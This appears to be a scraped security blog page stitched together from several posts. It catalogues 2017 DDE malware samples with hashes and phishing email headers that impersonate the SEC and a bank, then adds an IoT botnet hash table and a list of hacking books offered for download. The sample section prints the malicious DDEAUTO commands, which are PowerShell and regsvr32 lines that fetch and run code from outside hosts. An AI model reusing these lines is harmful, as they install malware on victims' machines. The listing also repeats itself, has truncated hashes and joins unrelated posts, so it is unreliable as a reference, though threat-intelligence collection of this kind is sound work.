Sunday, April 26, 2020
Saturday, April 25, 2020
DDE Command Execution Malware Samples
Here are a few samples related to the recent DDE Command execution
Reading:
10/18/2017 InQuest/yara-rules
10/18/2017 https://twitter.com/i/moments/918126999738175489
10/10/2017 NViso labs: MS Office DDE YARA rules
Download
File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
Payload
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669
File details with MD5 hashes:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
Payload
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669
File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")
2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")
3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e.
4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e "
5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_
6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")
7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")
8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a
9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460
10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450
Payload Powershell
1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt
2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier
Payload PE
1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e
2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
4f3a6e16950b92bf9bd4efe8bbff9a1e
3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe Poland payload
09d71f068d2bbca9fac090bde74e762b
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")
2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")
3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e.
4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e "
5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_
6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")
7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")
8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a
9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460
10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450
Payload Powershell
1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt
2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier
Payload PE
1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e
2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
4f3a6e16950b92bf9bd4efe8bbff9a1e
3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe Poland payload
09d71f068d2bbca9fac090bde74e762b
Message information
For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236]) by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
signatures=0
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
definitions=main-1710110060
This is a multi-part message in MIME format.
--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: multipart/alternative;
boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"
--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/plain; charset=us-ascii
Important information about last changes in EDGAR Filings
--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/html; charset=us-ascii
<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>
--b2_7608a3de5fe6c9bf7df6782a8aa9790f--
--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx
<snip>
--b1_7608a3de5fe6c9bf7df6782a8aa9790f--
for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
(2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
(2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
SMTP Server (version=TLS1_2,
cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> (10.234.178.186) by
<snip>(10.144.20.58) with Microsoft SMTP
Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> (10.234.174.102) by
<snip> with Microsoft SMTP Server
id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
[188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
<Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
(BST)
Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
received-spf: Fail (protection.outlook.com: domain of <snip> does
not designate 147.152.120.47 as permitted sender)
receiver=protection.outlook.com; client-ip=147.152.120.47;
helo=<snip>;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
MIME-Version: 1.0
Related word
W3AF
"W3AF is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. This project is currently hosted at SourceForge." read more...Amnesia / Radiation Linux Botnet Targeting Remote Code Execution In CCTV DVR Samples
2016-08-11 CyberX Radiation IoT Cybersecurity campaign
Download
Hashes
| MD5 | SHA256 | SHA1 |
|---|---|---|
| 74bf554c4bc30d172cf1d73ac553d766 | 06d30ba7c96dcaa87ac584c59748708205e813a4dffa7568c1befa52ae5f0374 | 3c40221177383da576b11a0b3f6b35d68a9cde74 |
| 5dd9056e5ab6a92e61822b6c04afd346 | 10aa7b3863f34d340f960b89e64319186b6ffb5d2f86bf0da3f05e7dbc5d9653 | c865dd67853a24fd86ef74b05140827c1d5fd0bd |
| 2b486466f4d3e30f7b22d0bc76cb68f9 | 175fe89bbc8e44d45f4d86e0d96288e1e868524efa260ff07cb63194d04ea575 | ed62f6d1588bea33c20ababb42c02662d93d6015 |
| 3411bb2965f4c3d52c650aff04f48e52 | 1d8bc81acbba0fc56605f60f5a47743491d48dab43b97a40d4a7f6c21caca12a | 1e0281178b4a9d8dec74f50a7850867c87837435 |
| 34f915ac414e9aad2859217169f9a3aa | 2f9cd1d07c535aae41d5eed1f8851855b95b5b38fb6fe139b5f1ce43ed22df22 | d66f1e47c983a8d30ad7fd30cd08db8cd29a92b0 |
| 59e08f2ce1c3e55e2493baf36c1ad3c6 | 327f24121d25ca818cf8414c1cc704c3004ae63a65a9128e283d64be03cdd42e | 90d45b81e9a97ddcc9911122f4e8fd439ccc8fa9 |
| f4bc173bf80d922da4e755896af0db61 | 37b2b33a8e344efcaca0abe56c6163ae64026ccef65278b232a9170ada1972af | fab32f8c3ce3a837e80a1d98ada41a5bf39b01e7 |
| a253273e922ce93e2746a9791798e3fe | 3a595e7cc8e32071781e36bbbb680d8578ea307404ec07e3a78a030574da8f96 | 99cfdec405f6a9f43d58b1856fce7ca3445395d3 |
| 335e322c56278e258e4d7b5e17ad98e6 | 4313af898c5e15a68616f8c40e8c7408f39e0996a9e4cc3e22e27e7aeb2f8d54 | 504022707609a0fec9cbb21005cb0875be2a4726 |
| 93522e5f361a051f568bd1d74d901d30 | 46ea20e3cf34d1d4cdfd797632c47396d9bdc568a75d550d208b91caa7d43a9b | e7fc96b2a92888572de2539f227c9a6625449f83 |
| c86af536d87c1e5745e7d8c9f44fd25d | 4b0feb1dd459ade96297b361c69690ff69e97ca6ee5710c3dc6a030261ba69e0 | 6ef69a683913ae650634aedc40af8d595c45cb4f |
| 90c7c5e257c95047dbf52bbfbe011fd6 | 4db9924decd3e578a6b7ed7476e499f8ed792202499b360204d6f5b807f881b8 | 1c3a9be6ae9300aaad00fb87d5407ed6e84ec80b |
| 7c0528e54b086e5455ef92218ea23d03 | 5e6896b39c57d9609dc1285929b746b06e070886809692a4ac37f9e1b53b250c | 868abc912ff2fdcd733ff1da87e48e7d4c288a73 |
| 6405b42d2c7e42244ac73695bb7bfe6b | 64f03fff3ed6206337332a05ab9a84282f85a105432a3792e20711b920124707 | 173aca65181c8da84e062c803a43a404ad49302d |
| 6441157813de77d9849da5db9987d0bb | 6b2885a4f8c9d84e5dc49830abf7b1edbf1b458d8b9d2bafb680370106f93bc3 | 92dff9bdb31d3b9480d9e5f72a307715859dd094 |
| 614ea66b907314398cc14b3d2fdebe79 | 6b29b65c3886b6734df788cfc6628fbee4ce8921e3c0e8fc017e4dea2da0fd0b | c7e71c42d391f9c69375505dbf3767ba967f9103 |
| 00fe3120a666a85b84500ded1af8fb61 | 885dce73237c4d7b4d481460baffbd5694ab671197e8c285d53b551f893d6c09 | 342ed67e08d16ab982a4012fcecdca060a5da46b |
| 5477de039f7838dea20d3be1ae249fcb | 886136558ec806da5e70369ee22631bfb7fa06c27d16c987b6f6680423bc84b0 | 5b19202b45e5a58cadec8c2efa40fd924b64177d |
| 91bf10249c5d98ea6ae11f17b6ef0970 | 8f57ec9dfba8cf181a723a6ac2f5a7f50b4550dd33a34637cf0f302c43fd0243 | 682dab9ec3ff0b629cce4e16c9c74171dd2551d4 |
| fb0a7e12d2861e8512a38a6cdef3ddf0 | 9351ee0364bdbb5b2ff7825699e1b1ee319b600ea0726fd9bb56d0bd6c6670cb | c077c490bb22df9886475dc5bedfc6c032061024 |
| 9b7f5a1228fa66cbd35e75fb774fdc8e | 9c7a5239601a361b67b1aa3f19b462fd894402846f635550a1d63bee75eab0a2 | ae89bc6c5cc1818b3136a40961462327c3dececc |
| 5b97d54dc5001eb7cf238292405070a6 | a010bf82e2c32cba896e04ec8dbff58e32eee9391f6986ab22c612165dad36a0 | 96d2194f5f3927de75605f6ca6110fe683383a01 |
| 642f523bb46c2e901416047dca1c5d4e | ad65c9937a376d9a53168e197d142eb27f04409432c387920c2ecfd7a0b941c8 | bbf667213a446bc9bc4a5a2e54e7391752e3a9b8 |
| c617655312c573ecb01d292b320fff2e | aeb480cf01696b7563580b77605558f9474c34d323b05e5e47bf43ff16b67d6a | de102a6f35e08f18aa0c58358f5b22871eb0a45f |
| c8835a3d385162ae02bd4cb6c5ebac87 | b113ec41cc2fd9be9ac712410b9fd3854d7d5ad2dcaac33af2701102382d5815 | 831eb9cf0dcd57a879c04830e54a3b85fe5d6229 |
| 1497740fa8920e4af6aa981a5b405937 | b13014435108b34bb7cbcef75c4ef00429b440a2adf22976c31a1645af531252 | 8d6b90f0b88b1ad5dcc87d377e6a82dc6ac64211 |
| 5e925e315ff7a69c2f2cf1556423d5af | b3d0d0e2144bd1ddd27843ef65a2fce382f6d590a8fee286fda49f8074711545 | 64fe900b3a2b030c28211404afa45703c6869dea |
| 951ec487fb3fece58234677d7fe3e4dc | bdefa773e3f09cdc409f03a09a3982f917a0cc656b306f0ece3dd1a2564a8772 | 0b03d9471522590530dd90ad30b2d235ec98b578 |
| 3e84998197fc25cbac57870e3cdeb2de | c03b403d5de9778a2ec5949d869281f13976c2fc5b071e0f5f54277680c80902 | 0b9eb6d931dc6b226a913e89bb422f58228de0d0 |
| c3a73d24df62057e299b6af183889e6b | cb2382b818993ef6b8c738618cc74a39ecab243302e13fdddb02943d5ba79483 | 6a683ef6f7653e5ee64969cbbbe4403601ae9ded |
| d428f50a0f8cd57b0d8fe818ace6af20 | ce61dcfc3419ddef25e61b6d30da643a1213aa725d579221f7c2edef40ca2db3 | 9bd832256b94e43546dfb77532f6d70fcd1ce874 |
| e1d6d4564b35bb19d2b85ca620d7b8f2 | d0bda184dfa31018fe999dfd9e1f99ca0ef502296c2cccf454dde30e5d3a9df9 | c1af00d3263893b5d23dbf38015fe3c6a92cefaf |
| e9502ae7b0048b9ea25dd7537818904c | e7d6b3e1fba8cdf2f490031e8eb24cd515a30808cdd4aa15c2a41aa0016f8082 | 0e080ac0130ab3f7265df01b8397e4abd13c38cb |
| 8eb34e1fb7dd9d9f0e1fef2803812759 | eb54dc959b3cc03fbd285cef9300c3cd2b7fe86b4adeb5ca7b098f90abb55b8a | 5310a99f0f8c92bfa2f8da87e60c645f2cae305a |
| ca0fc25ce066498031dc4ca3f72de4b8 | f23fecbb7386a2aa096819d857a48b853095a86c011d454da1fb8e862f2b4583 | 7f4d97eea294fc567b058b09cc915be56c2a80e1 |
| 5a2fcfff8d6aab9a0abe9ca97f6093ed | f6af2fa4f987df773d37d9bb44841a720817ce3817dbf1e983650b5af9295a16 | f4ddf49fbf23edb23f50be62637a4a688e352057 |
| ed98e8fa385b39ca274e0de17b1007e6 | f7a737cb73802d54f7758afe4f9d0a7d2ea7fda4240904c0a79abae732605729 | a69d4c2b88bfe3a06245f8fbfb8abe5e9a894cec |
| 320db5f1230fcfe0672c8515eb9ddcfc | f7cf1e0d7756d1874630d0d697c3b0f3df0632500cff1845b6308b11059deb07 | 8d40dbf34a02dd43a81e5cdc58a0b11bfa9f5663 |
| 18d6af9211d0477f9251cf9524f898f3 | f97848514b63e9d655a5d554e62f9e102eb477c5767638eeec9efd5c6ad443d8 | b0e76be186fd609d5a8a33d59d16ffa3bdab1573 |
5 BEST HACKING BOOKS 2018
Most of the people don't go with videos and read books for learning. Book reading is a really effective way to learn and understand how things work. There are plenty of books about computers, security, penetration testing and hacking. Every book shows a different angle how things work and how to make system secure and how it can be penetrated by hackers. So, here I have gathered a few of the best hacking books of 2018 available on the market.
BEST HACKING BOOKS OF 2018
There are hundreds of books about hacking, but I have streamlined few of best hacking books of 2018.
1. THE HACKER'S PLAYBOOK PRACTICAL GUIDE TO PENETRATION
This handbook is about experting yourself with the hacking techniques in the hacker's way. This is about penetration testing that how hackers play their techniques and how we can counter them.
CONTENTS
- Introduction
- Pregame – The Setup
- Setting Up a Penetration Testing Box
- Before the Snap – Scanning the Network
- The Drive – Exploiting Scanner Findings
- The Throw – Manual Web Application Findings
- The Lateral Pass – Moving Through the Network
- The Screen – Social Engineering
- The Onside Kick – Attacks that Require Physical Access
- The Quarterback Sneak – Evading AV
- Special Teams – Cracking, Exploits, Tricks
- Post Game Analysis – Reporting
Download the Hacker's Playbook Practical Guide to Penetration.
2. ANDROID HACKER'S HANDBOOK
The Android Hacker's Handbook is about how the android devices can be hacked. Authors chose to write this book because the field of mobile security research is so "sparsely charted" with disparate and conflicted information (in the form of resources and techniques).
CONTENTS
- Chapter 1 Looking at the Ecosystem
- Chapter 2 Android Security Design and Architecture
- Chapter 3 Rooting Your Device
- Chapter 4 Reviewing Application Security
- Chapter 5 Understanding Android's Attack Surface
- Chapter 6 Finding Vulnerabilities with Fuzz Testing
- Chapter 7 Debugging and Analyzing Vulnerabilities
- Chapter 8 Exploiting User Space Software
- Chapter 9 Return Oriented Programming
- Chapter 10 Hacking and Attacking the Kernel
- Chapter 11 Attacking the Radio Interface Layer
- Chapter 12 Exploit Mitigations
- Chapter 13 Hardware Attacks
Download Android Hacker's Handbook.
3. PENETRATION TESTING: A HANDS-ON INTRODUCTION TO HACKING
This book is an effective practical guide to penetration testing tools and techniques. How to penetrate and hack into systems. This book covers beginner level to highly advanced penetration and hacking techniques.
CONTENTS
- Chapter 1: Setting Up Your Virtual Lab
- Chapter 2: Using Kali Linux
- Chapter 3: Programming
- Chapter 4: Using the Metasploit Framework
- Chapter 5: Information Gathering
- Chapter 6: Finding Vulnerabilities
- Chapter 7: Capturing Traffic
- Chapter 8: Exploitation
- Chapter 9: Password Attacks
- Chapter 10: Client-Side Exploitation
- Chapter 11: Social Engineering
- Chapter 12: Bypassing Antivirus Applications
- Chapter 13: Post Exploitation
- Chapter 14: Web Application Testing
- Chapter 15: Wireless Attacks
- Chapter 16: A Stack-Based Buffer Overflow in Linux
- Chapter 17: A Stack-Based Buffer Overflow in Windows
- Chapter 18: Structured Exception Handler Overwrites
